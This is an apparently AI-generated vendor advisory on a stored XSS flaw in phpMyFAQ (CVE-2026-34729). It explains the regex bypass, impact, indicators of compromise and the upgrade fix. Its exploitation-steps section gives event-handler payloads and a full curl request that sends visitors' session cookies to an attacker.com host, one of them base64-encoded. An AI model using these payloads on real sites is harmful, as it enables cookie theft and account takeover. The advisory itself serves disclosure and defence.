CVE-2026-34729: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34729 is a stored Cross-Site Scripting (XSS) vulnerability in phpMyFAQ caused by a regex bypass in the Filter::removeAttributes() sanitization function. It affects all phpMyFAQ versions up to and including 4.1.0 (Composer package phpmyfaq/phpmyfaq). The vulnerability was published on March 31, 2026, and patched in version 4.1.1 released the same day. It carries a CVSS v3.1 base score of 6.1 (Moderate) per the GitHub Advisory, though Feedly's data notes an alternative score of 4.8 (Github Advisory, phpMyFAQ Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation). The three-step sanitization pipeline in FaqController::create() first encodes special characters to HTML entities via FILTER_SANITIZE_SPECIAL_CHARS, then decodes them back with html_entity_decode(), and finally calls Filter::removeAttributes() to strip dangerous HTML attributes. The flaw lies in the regex used at Filter.php line 174 — /[a-z]+=".+"/iU — which only matches attributes with double-quoted values, leaving single-quoted (e.g., onerror='alert(1)') and unquoted (e.g., onerror=alert(1)) event handler attributes completely undetected and unremoved. The sanitized (but still malicious) question field is then rendered directly in faq.twig line 36 using the |raw filter, bypassing any further escaping (Github Advisory, phpMyFAQ Advisory).

Impact

An authenticated administrator who plants a malicious FAQ payload causes stored XSS to execute in the browsers of all users — including unauthenticated visitors — who view the affected FAQ page. Potential consequences include session cookie theft (enabling account takeover), phishing via injected fake login forms, malware distribution through redirects to attacker-controlled sites, and self-replicating XSS worms that create additional malicious FAQs. Availability is not directly impacted, but confidentiality and integrity of user sessions and site content are both at high risk (phpMyFAQ Advisory).

Exploitability

A proof-of-concept exploit with step-by-step instructions, including a specific curl command targeting the /admin/api/faq/create endpoint, is publicly available in the GitHub Security Advisory (phpMyFAQ Advisory). Exploitation requires high privileges (admin authentication) to plant the payload, but the XSS subsequently executes for all public visitors without any further interaction beyond viewing the FAQ page. There is no evidence of in-the-wild exploitation at this time, and the CVE is not listed in the CISA KEV catalog. The EPSS score is approximately 0.03–0.05%, placing it in the 16th percentile for exploitation likelihood (Github Advisory).

Exploitation steps

  1. Obtain admin credentials: Acquire valid phpMyFAQ administrator credentials and a session cookie (e.g., PHPSESSID) through phishing, credential stuffing, or other means.
  2. Retrieve a valid CSRF token: Log into the admin panel and extract a valid pmf-csrf-token from the FAQ creation form or API response.
  3. Craft the malicious payload: Prepare an XSS payload using unquoted or single-quoted event handler attributes to bypass the removeAttributes() regex, e.g., <img src=x onerror=alert(document.cookie)> or <img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>.
  4. Submit the malicious FAQ: Send a POST request to the FAQ creation API endpoint with the payload embedded in the question field:
curl -X POST 'https://target.example.com/admin/api/faq/create' \
  -H 'Content-Type: application/json' \
  -H 'Cookie: PHPSESSID=admin_session' \
  -d '{"data": {"pmf-csrf-token": "valid_csrf_token", "question": "<img src=x onerror=fetch(atob(\"aHR0cHM6Ly9hdHRhY2tlci5jb20vc3RlYWw/Yz0=")+document.cookie)>", "answer": "Test", "lang": "en", "categories[]": 1, "active": "yes"}}'
  1. Distribute the FAQ URL: The XSS payload is now stored and executes for every visitor who navigates to https://target.example.com/content/{categoryId}/{faqId}/{lang}/{slug}.html.
  2. Harvest results: Collect stolen session cookies or credentials at the attacker-controlled server, then use them to hijack user accounts (phpMyFAQ Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from user browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from FAQ page visits; unusual POST requests to /admin/api/faq/create containing HTML event handler attributes (onerror, onload, onclick) in the question field.
  • Logs: Web server access logs showing POST requests to /admin/api/faq/create with JSON bodies containing unquoted or single-quoted HTML attributes; access logs showing high traffic to specific FAQ content URLs (/content/{categoryId}/{faqId}/{lang}/{slug}.html) shortly after FAQ creation.
  • File System / Database: FAQ records in the database where the question field contains raw HTML tags with event handler attributes (e.g., <img, <svg, onerror=, onload=) not enclosed in double quotes.
  • Application: Unexpected new FAQ entries created by admin accounts, especially those with question fields containing HTML markup; Twig template rendering of {{ question | raw }} with unsanitized HTML content (phpMyFAQ Advisory).

Mitigation and workarounds

Upgrade phpMyFAQ to version 4.1.1 or later, which patches the regex in Filter::removeAttributes() to also match single-quoted and unquoted HTML attributes (phpMyFAQ Release). As a temporary workaround, restrict FAQ management access strictly to trusted administrators, implement a Content Security Policy (CSP) header that blocks inline script execution, and audit existing FAQ content for suspicious event handler attributes. Consider replacing the custom regex-based sanitizer with a robust HTML sanitization library (e.g., HTML Purifier) that correctly handles all attribute quoting styles (phpMyFAQ Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management